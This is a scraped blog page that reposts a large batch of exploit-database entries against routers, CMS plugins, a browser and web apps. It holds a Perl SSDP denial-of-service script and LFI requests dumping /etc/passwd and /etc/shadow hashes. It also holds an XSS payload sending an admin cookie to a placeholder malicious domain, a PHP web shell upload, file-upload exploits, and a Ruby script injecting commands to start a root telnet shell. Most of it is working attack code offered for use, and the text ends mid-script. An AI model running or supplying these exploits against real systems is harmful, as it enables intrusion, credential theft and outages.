source: https://www.securityfocus.com/bid/54613/info
Maian Survey is prone to a URI-redirection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to execute arbitrary local files within the context of the webserver process or redirect users to a potentially malicious site. This may aid in phishing attacks or allow the attacker to compromise the application; other attacks are also possible.
Maian Survey 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/[PATH]/admin/index.php?cmd=LF�°_here
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863538666
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/54611/info
The 'com_hello' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/54599/info
Arora Browser is prone to a remote denial-of-service vulnerability.
Attackers can exploit these issues to crash an application, which causes a denial-of-service condition.
<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
var buffer = "";
for (var i = 0; i < 8000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 8000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>
#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Usage:
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT STATE SERVICE
# 1900/udp open upnp
# | upnp-info:
# | 192.168.1.1
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0
# | Location: http://192.168.1.1:5000/rootDesc.xml
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# | Name: INFOMARK Router
# | Manufacturer: INFOMARK
# | Model Descr: INFOMARK Router
# | Model Name: INFOMARK Router
# | Model Version: 1
# | Name: WANDevice
# | Manufacturer: MiniUPnP
# | Model Descr: WAN Device
# | Model Name: WAN Device
# | Model Version: 20070228
# | Name: WANConnectionDevice
# | Manufacturer: MiniUPnP
# | Model Descr: MiniUPnP daemon
# | Model Name: MiniUPnPd
# |_ Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT STATE SERVICE
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#
use Socket;
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}
my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];
print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);
if (!defined $ip_dst) {
print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
select(undef, undef, undef, 0.55);
print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
print "[ Example:\n[ perl $0 192.168.1.1\n";
print "[ =============================================== ]\n";
print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
exit;
}
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();
# Main program
sub main {
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= payload();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
# IP Packet construction
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$ip_src, $ip_dst
);
return $iphdr;
}
# UDP header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port, $udp_dst_port,
$udp_len, $udp_checksum
);
return $udphdr;
}
# Create SSDP Bomb
sub payload {
my $data;
my $head;
$data = "M-SEARCH * HTTP\/1.1\\r\\n";
for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
my $payload = pack('a' . length($data), $data);
return $payload;
}
# Generate random source ip address
sub randip () {
srand(time() ^ ($$ + ($$ << 15)));
my $ipdata;
$ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
my $ipsrc = pack('A' . length($ipdata), rand($ipdata));
return $ipdata;
}
# Send the malformed packet
sub send_packet {
print "[ Target: $ARGV[0]\n";
select(undef, undef, undef, 0.30);
print "[ Send malformed SSDP packet..\n\n";
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in
#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################
Summary:
The Dlink DSL-2750u and DSL-2730u wireless router improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.
Desc:
The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources.
Tested on: mini_httpd/1.19 19dec2003
===============================================================
GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive
HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive
HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
# Exploit Title: CSRF & XSS
# Google Dork: intitle: CSRF & XSS
# Date: 2015-07-05
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: bitbucket.org/phpliteadmin
# Software Link: bitbucket.org/phpliteadmin
# Version: v1.1
# Tested on: windows 7
# Category: webapps
Vendor:
================================
bitbucket.org/phpliteadmin
Product:
================================
phpLiteAdmin v1.1
Advisory Information:
================================================
CSRF & XSS Vulnerabilities
Vulnerability Details:
======================
CSRF:
------
No CSRF token exists when making calls to various SQL operations
therefore we can get user to drop the whole database tables if they click
on our malicious link and table is known.
XSS:
------
There are three XSS vulnerabilities I point out first is use of 'PHP_SELF',
second is unsanitized parameter
for SQL statement when calling drop table method e.g. '
http://localhost/phpliteadmin.php?droptable=[XSS]'
and third is an unsanitized 'table' parameter e.g. '
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'
Lets look at the first one more in depth as its more fun.
phpliteadmin uses a PHP reserved server variable $_SERVER['PHP_SELF'] which
is vulnerable if not used correctly
allowing us to inject an XSS payload to steal session cookies and navigate
them to a place of our choosing
in order to cause mayhem.
On line 32 of 'phpliteadmin.php' we find vulnerable code:
--------------------------------------------------------
//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']);
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];
//constants
define("VERSION", "1.1");
define("PAGE", $thisName);
-------------------------------------------------------
In PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document
root."
ref: http://php.net/manual/en/reserved.variables.server.php
It is known $_SERVER['PHP_SELF'] can make your application insecure as we
can inject code following a forward slash "/"
But we have slight problem to overcome, we can execute code but our forward
slashes will not be processed correctly
and exploit will FAIL! leaving us with the following useless URL instead of
taking the victim to a domain of our choice.
Fail exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/
"'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"
Failed Result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org
But all is NOT lost!, we will construct our malicious URL forward slashes
in our JS call to window.open() method using
String.charCodeAt(58) for ':' and String.charCodeAt(47) for '/' which will
NOW give us what we seek, control over the users browser
taking them to some terrible dark place.
Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:
Tada!, our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'
hyp3rlinx.altervista.org';window.open(x);})()"
Exploit code(s):
===============
XSS(s) POC:
----------
1- $_SERVER['PHP_SELF'] XSS exploit steals current admin session cookie and
sends to remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"
2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=
<script>alert(666)</script>
3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=
"/><script>alert(666)</script>
CSRF POC:
---------
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1
Disclosure Timeline:
=========================================================
Vendor Notification: NA
July 5, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] phpliteadmin_v1-1
Vulnerable Parameter(s): [+] $_SERVER['PHP_SELF'], droptable, table
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)
source: https://www.securityfocus.com/bid/54593/info
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable.
www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
source: https://www.securityfocus.com/bid/54593/info
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable.
www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
File Path: site/wp-content/uploads/uigen_YEAR/file.php
Example: site/wp-content/uploads/uigen_2015/evil.php
evil.php: <?php passthru($_GET['cmd']); ?>
TUNISIAN CYBER(miutex)-S4E
/*
source: https://www.securityfocus.com/bid/54477/info
Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.
Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it.
*/
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}
source: https://www.securityfocus.com/bid/54591/info
AVA VoIP is prone to multiple security vulnerabilities because the application fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, upload and execute arbitrary files in the context of the web server, and launch other attacks.
AVA VoIP 1.5.12 is vulnerable; other versions may also be affected.
http://www.example.com/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
source: https://www.securityfocus.com/bid/54470/info
EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00
source: https://www.securityfocus.com/bid/54466/info
web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
web@all 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E
source: https://www.securityfocus.com/bid/54467/info
Rama Zeiten CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
Rama Zeiten CMS 0.99 is vulnerable; other versions may also be affected.
http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd
source: https://www.securityfocus.com/bid/54456/info
Simple Machines is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected.
Proof of Concept:
=================
The persistent input validation vulnerability can be exploited by remote attacker with local low privileged user account & low required
user inter action. For demonstration or reproduce ...
Review: Package Manager > Download New Packages > FTP Information Required (Listing)
<dd>
<input size="30" name="ftp_server" id="ftp_server" type="text"><[PERSISTENT SCRIPT CODE]' <"="" class="input_text">
<label for="ftp_port">Port: </label>
<input type="text" size="3" name="ftp_port" id="ftp_port" value="21"
class="input_text" />
... or
<dd>
<input size="50" name="ftp_path" id="ftp_path" value="public_html/demo/smf "
type="text"><[PERSISTENT SCRIPT CODE])' <"="" style="width: 99%;" class="input_text">
</dd>
</dl>
<div class="righttext">
URL: http://www.example.com/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626
Review: Smiley Sets > Add
<tr class="windowbg" id="list_smiley_set_list_0">
<td style="text-align: center;"></td>
<td class="windowbg">Akyhne's Set</td>
<td class="windowbg">"><[PERSISTENT SCRIPT CODE]' <="" <strong="">
akyhne</strong>/...</td>
URL: http://www.example.com/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2
Review: Newsletter > Add
<input name="email_force" value="0" type="hidden">
<input name="total_emails" value="1" type="hidden">
<input name="max_id_member" value="13" type="hidden">
<input name="groups" value="0,1,2,3" type="hidden">
<input name="exclude_groups" value="0,1,2,3" type="hidden">
<input name="members" value="" type="hidden">
<input name="exclude_members" value="" type="hidden">
<input name="emails" value="" type="hidden"><[PERSISTENT SCRIPT CODE])' <"="">
</form>
</div>
<br class="clear" />
</div>
URL: http://www.example.com/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
Review: Edit Membergroups & User/Groups Listing
<h3 class="catbg">Edit Membergroup - "><[PERSISTENT SCRIPT CODE])' <"=""><[PERSISTENT SCRIPT CODE]) <"
><ifram
</h3>
</div>
<div class="windowbg2">
<span class="topslice"><span></span></span>
URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
source: https://www.securityfocus.com/bid/54459/info
The Post Recommendations plug-in for WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Post Recommendations 1.1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('abspath'=>"http://localhost/lo.txt\0"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
lo.txt
<?php phpinfo(); ?>
#/IN THE NAME OF GOD
#/auth====PARSA ADIB
import sys,requests,re,urllib2
def logo():
print"\t\t .__ .___ .__ .___"
print"\t\t_____ |__|______ __| _/______ ____ |__| __| _/"
print"\t\t\__ \ | \_ __ \/ __ |\_ __ \/ _ \| |/ __ | "
print"\t\t / __ \| || | \/ /_/ | | | \( <_> ) / /_/ | "
print"\t\t(____ /__||__| \____ | |__| \____/|__\____ | "
print"\t\t \/ \/ \/ "
print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
if len(sys.argv)<6 or len(sys.argv)>6 :
logo()
print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
else :
logo()
print "\n[+]Reciving Details\n-----------------------------"
try :
p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/')
except IOError :
print "\n[!] Check If server is Running"
sys.exit()
for i in p.content.split(',') :
for char in '{"}_':
i = i.replace(char,'').upper()
print "[*]"+i+""
print "\n[+]Sending File\n-----------------------------"
try :
r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
if (r.status_code == 200) :
print "[*]RESPONSE:200"
print "[*]FILE SENT SUCCESSFULY"
except IOError :
print "\n[!] Error"
source: https://www.securityfocus.com/bid/54172/info
Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
# Version : 1.0.4
# Link : http://www.silverstripe.org/pixlr-image-editor-module/
# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
# Date : 21-06-2012
# Google Dork : not discover
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
# Date: 30/06/2015
# Exploit Author: DNO
# Vendor Homepage: [link]
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
the only 'filtering' on this resources appears to be a sprintf()
call which statically prefixes a submitted 'dev' argument with '/www'.
However,
if a HTTP request is performed without a 'dev' argument at all, the
sprintf() call is never reached,
and a fully-qualified path can be provided in the 'path' parameter -
bypassing the upload path restriction.
***************
# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl \
-X POST \
-i \
-F name=@test.txt \
--http1.0 \
'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
========================================
# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
# Date: 30/06/2015
# Exploit Author: DNO
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
Severity Level:
===============
High
===============
Patches made to lighttpd by the vendor of this device allows an attacker to
query the device, without authentication, for the following information:
# Current WLAN SSIDs
# Current WLAN channels
# LAN and WAN MAC addressing
# Current firmware version information
# Hardware version information
Although not sensitive information, it may allow for identification of
devices running vulnerable firmware versions.
=========================================
# Information query.
curl \
192.168.1.3/mplist.txt
========================================
#ruby poc
----
# DSP-W110-Lighttpd PoC.
require 'pp'
require 'optparse'
require 'restclient'
# Set defaults and parse command line arguments
options = {}
options[:addr] = "192.168.0.60"
options[:port] = 80
OptionParser.new do |option|
option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
options[:addr] = a
end
option.on("--port [PORT]", "Destination TCP port") do |p|
options[:port] = p
end
option.parse!
end
# Define which actions we will be using.
actions = [
{
:name => "Get device information",
:call => "txt_parser",
:path => "mplist.txt",
},
{
:name => "Snatch configuration",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`cp /etc/co* /www/`" }
},
{
:name => "Fetch configuration",
:call => "conf_writer",
:path => "config.sqlite",
},
{
:name => "Enable telnet (root)",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
}
]
def noop(val)
return
end
def txt_parser(txt)
txt.split(/\r?\n/).each do |line|
puts " #{line}"
end
end
def conf_writer(txt)
begin
f = File.open('./config.sqlite', 'wb')
rescue => e
puts "[!] Failed to open config.sqlite for writing #{e.message}"
end
f.write(txt)
f.close
